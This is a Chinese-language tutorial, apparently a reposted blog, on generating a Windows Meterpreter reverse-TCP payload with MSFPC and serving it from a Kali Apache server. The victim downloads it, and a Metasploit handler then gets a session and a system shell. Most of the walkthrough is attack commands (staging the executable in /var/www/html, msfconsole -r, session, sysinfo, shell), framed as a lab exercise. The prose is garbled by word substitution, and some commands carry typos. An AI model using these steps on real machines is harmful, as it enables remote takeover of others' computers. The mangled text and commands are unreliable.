一样平常来说,天生payload的默认工具是MSFvenom,这是一个独立于Metasploit的payload天生器及编码器。虽然它是一个非常强大的payload天生神器,但是对付一些新手来说,可能难以在短韶光内熟习其操作。纵然在进行最初的理解之后,天生一个基本的payload也须要输入相称多的内容,而本日,我们将看到利用MSFPC更便捷地天生paylaod。
MSFPC,或者说是MSFvenom Payload天生器,实在是一个基于MSFvenom的Payload天生器,但是它旨在简化基本的有效载荷创建过程,用户利用MSFPC可以尽可能大略地创建Payload,有时乃至只须要一个参数!
如果你以前利用过MSFvenom,那么可能已经自行编写了一个大略的shell脚本来自动化频繁地天生Payload。纵然这样,这个工具也绝对值得一试。
二、资源装备
1.安装好 Kali Linux 的虚拟机一台;
2.kali linux 受害者虚拟机一个;
3.整装待发的小白一个。
三、渗透攻防
3.1 查看监听主机的apapche2状态,如下图所示。
命令:service apapche2 status
3.2 开启监听主机的apapche2主机,如下图所示。
命令:service apache2 start
3.3 将天生的“windows-meterpreter-staged-reverse-tcp-555.exe”文件复制到apapche2目录下,如下图所示。
命令:cp windows-meterpreter-staged-reverse-tcp-555.exe /var/www/html
3.4 删除“/var/www/html”目录下一些不相关的文件,只保留payload文件,如下图所示。
命令:rm /var/www/html/index.html
命令:rm /var/www/html/index.nginx-debian.html
3.5 查看“/var/www/html”目录下是否只存在payload文件,如下图所示。
命令:ls /var/www/html/
3.6 在物理机中访问处于监听状态下的kali linux主机,如下图所示
3.7 将天生的payload文件下载到物理主机,如下图所示。
3.8 连接payload文件,如下图所示。
命令:msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-5555-exe.rc'
3.9 查看session信息,如下图所示。
命令:session -i 1
3.10 成功拿下目标主机,如下图所示,查看目标主机的系统信息。
命令:sysinfo
3.10.1 利用shell访问目标主机,如下图所示。
命令:shell
3.10.2 办理shell界面乱码问题,如下图所示。
chcp 65001